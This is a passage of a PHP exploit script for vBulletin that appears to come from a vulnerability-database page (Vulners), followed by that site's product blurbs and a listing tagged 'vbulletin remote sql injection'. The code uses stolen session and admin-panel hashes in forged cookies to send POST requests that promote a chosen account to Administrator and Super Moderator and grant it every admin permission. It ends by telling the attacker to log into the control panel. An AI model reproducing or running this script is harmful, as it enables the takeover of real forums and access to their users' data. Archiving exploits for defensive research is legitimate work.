done!&nbsp;you&nbsp;are&nbsp;in...&nbsp;updating&nbsp;\".$user.\"&nbsp;rights\";}
else&nbsp;{die(\"
exploit&nbsp;failed...\");}

//join&nbsp;to&nbsp;the&nbsp;Administrator&nbsp;group
$my_email=\"[email protected]\";
$data&nbsp;=\"do=update\";
$data.=\"&adminhash=$adminhash\";
$data.=\"&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D\".$my_uid;
$data.=\"&user%5Busername%5D=$user\";
$data.=\"&password=\";
$data.=\"&user%5Bemail%5D=$my_email\";
$data.=\"&user%5Blanguageid%5D=0\";
$data.=\"&user%5Busertitle%5D=Admin\";
$data.=\"&user%5Bcustomtitle%5D=0\";
$data.=\"&user%5Bhomepage%5D=\";
$data.=\"&user%5Bbirthday%5D%5Bmonth%5D=0\";
$data.=\"&user%5Bbirthday%5D%5Bday%5D=\";
$data.=\"&user%5Bbirthday%5D%5Byear%5D=\";
$data.=\"&user%5Bshowbirthday%5D=0\";
$data.=\"&user%5Bsignature%5D=\";
$data.=\"&user%5Bicq%5D=\";
$data.=\"&user%5Baim%5D=\";
$data.=\"&user%5Byahoo%5D=\";
$data.=\"&user%5Bmsn%5D=\";
$data.=\"&user%5Bskype%5D=\";
$data.=\"&options%5Bcoppauser%5D=0\";
$data.=\"&user%5Bparentemail%5D=$my_email\";
$data.=\"&user%5Breferrerid%5D=\";
$data.=\"&user%5Bipaddress%5D=\";
$data.=\"&user%5Bposts%5D=0\";
$data.=\"&userfield%5Bfield1%5D=\";
$data.=\"&userfield%5Bfield2%5D=\";
$data.=\"&userfield%5Bfield3%5D=\";
$data.=\"&userfield%5Bfield4%5D=\";
$data.=\"&user%5Busergroupid%5D=6\";//primary&nbsp;usergroup,&nbsp;6=Administrators
$data.=\"&user%5Bdisplaygroupid%5D=-1\";
$data.=\"&user%5Bmembergroupids%5D%5B%5D=5\";//secondary&nbsp;usergroup,&nbsp;5=Super&nbsp;Moderators
$data.=\"&options%5Bshowreputation%5D=1\";
$data.=\"&user%5Breputation%5D=10\";
$data.=\"&user%5Bwarnings%5D=0\";
$data.=\"&user%5Binfractions%5D=0\";
$data.=\"&user%5Bipoints%5D=0\";
$data.=\"&options%5Badminemail%5D=1\";
$data.=\"&options%5Bshowemail%5D=0\";
$data.=\"&options%5Binvisible%5D=0\";
$data.=\"&options%5Bshowvcard%5D=0\";
$data.=\"&options%5Breceivepm%5D=1\";
$data.=\"&options%5Breceivepmbuddies%5D=0\";
$data.=\"&options%5Bemailonpm%5D=0\";
$data.=\"&user%5Bpmpopup%5D=0\";
$data.=\"&options%5Bshowsignatures%5D=1\";
$data.=\"&options%5Bshowavatars%5D=1\";
$data.=\"&options%5Bshowimages%5D=1\";
$data.=\"&user%5Bautosubscribe%5D=-1\";
$data.=\"&user%5Bthreadedmode%5D=0\";
$data.=\"&user%5Bshowvbcode%5D=1\";
$data.=\"&user%5Bstyleid%5D=0\";
$data.=\"&adminoptions%5Badminavatar%5D=0\";
$data.=\"&adminoptions%5Badminprofilepic%5D=0\";
$data.=\"&user%5Btimezoneoffset%5D=0\";
$data.=\"&options%5Bdstauto%5D=1\";
$data.=\"&options%5Bdstonoff%5D=0\";
$data.=\"&user%5Bdaysprune%5D=-1\";
$data.=\"&user%5Bjoindate%5D%5Bmonth%5D=2\";
$data.=\"&user%5Bjoindate%5D%5Bday%5D=26\";
$data.=\"&user%5Bjoindate%5D%5Byear%5D=2007\";
$data.=\"&user%5Bjoindate%5D%5Bhour%5D=14\";
$data.=\"&user%5Bjoindate%5D%5Bminute%5D=39\";
$data.=\"&user%5Blastactivity%5D%5Bmonth%5D=2\";
$data.=\"&user%5Blastactivity%5D%5Bday%5D=26\";
$data.=\"&user%5Blastactivity%5D%5Byear%5D=2007\";
$data.=\"&user%5Blastactivity%5D%5Bhour%5D=14\";
$data.=\"&user%5Blastactivity%5D%5Bminute%5D=58\";
$data.=\"&user%5Blastpost%5D%5Bmonth%5D=0\";
$data.=\"&user%5Blastpost%5D%5Bday%5D=\";
$data.=\"&user%5Blastpost%5D%5Byear%5D=\";
$data.=\"&user%5Blastpost%5D%5Bhour%5D=\";
$data.=\"&user%5Blastpost%5D%5Bminute%5D=\";
$data.=\"&userid=\".$mu_uid;
$data.=\"&ousergroupid=\";
$data.=\"&odisplaygroupid=0\";
$data.=\"&userfield%5Bfield1_set%5D=1\";
$data.=\"&userfield%5Bfield2_set%5D=1\";
$data.=\"&userfield%5Bfield3_set%5D=1\";
$data.=\"&userfield%5Bfield4_set%5D=1\";
$packet&nbsp;=\"POST&nbsp;\".$p.\"admincp/user.php?do=edit&u=$my_uid&nbsp;HTTP/1.0
\";
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
$packet.=\"Accept-Language:&nbsp;en
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
$packet.=\"Pragma:&nbsp;no-cache
\";
$packet.=\"Cookie:&nbsp;\".$cookie_prefix.\"lastactivity=0;&nbsp;\".$cookie_prefix.\"password=\".md5(trim($my_hash)).\";&nbsp;\".$cookie_prefix.\"userid=\".$uid.\";&nbsp;\".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\";&nbsp;\".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\";
\";
$packet.=\"Connection:&nbsp;Close

\";
$packet.=$data;
sendpacketii($packet);
sleep(1);

//now&nbsp;give&nbsp;full&nbsp;rights&nbsp;to&nbsp;the&nbsp;new&nbsp;Administrator
$data&nbsp;=\"do=update\";
$data.=\"&adminhash=\".$adminhash;
$data.=\"&adminpermissions%5Bcanadminsettings%5D=1\";
$data.=\"&adminpermissions%5Bcanadminstyles%5D=1\";
$data.=\"&adminpermissions%5Bcanadminlanguages%5D=1\";
$data.=\"&adminpermissions%5Bcanadminforums%5D=1\";
$data.=\"&adminpermissions%5Bcanadminthreads%5D=1\";
$data.=\"&adminpermissions%5Bcanadmincalendars%5D=1\";
$data.=\"&adminpermissions%5Bcanadminusers%5D=1\";
$data.=\"&adminpermissions%5Bcanadminpermissions%5D=1\";
$data.=\"&adminpermissions%5Bcanadminfaq%5D=1\";
$data.=\"&adminpermissions%5Bcanadminimages%5D=1\";
$data.=\"&adminpermissions%5Bcanadminbbcodes%5D=1\";
$data.=\"&adminpermissions%5Bcanadmincron%5D=1\";
$data.=\"&adminpermissions%5Bcanadminmaintain%5D=1\";
$data.=\"&adminpermissions%5Bcanadminplugins%5D=1\";
$data.=\"&cssprefs=\";
$data.=\"&dismissednews=\";
$data.=\"&userid=\".$my_uid;
$data.=\"&oldpermissions=98300\";
$data.=\"&adminpermissions%5Bcanadminupgrade%5D=0\";
$packet&nbsp;=\"POST&nbsp;\".$p.\"admincp/adminpermissions.php?do=update&nbsp;HTTP/1.0
\";
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
$packet.=\"Accept-Language:&nbsp;en
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
$packet.=\"Pragma:&nbsp;no-cache
\";
$packet.=\"Cookie:&nbsp;\".$cookie_prefix.\"lastactivity=0;&nbsp;\".$cookie_prefix.\"password=\".md5(trim($my_hash)).\";&nbsp;\".$cookie_prefix.\"userid=\".$uid.\";&nbsp;\".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\";&nbsp;\".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\";
\";
$packet.=\"Connection:&nbsp;Close

\";
$packet.=$data;
sendpacketii($packet);
echo&nbsp;\"
now&nbsp;go&nbsp;to&nbsp;http://\".$host.$path.\"admincp/index.php&nbsp;and&nbsp;login&nbsp;to&nbsp;the&nbsp;control&nbsp;panel...\";
?>

&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Mar 2007 00:00Current
7.1High risk
Vulners AI Score7.1
vbulletin remote sql injection
13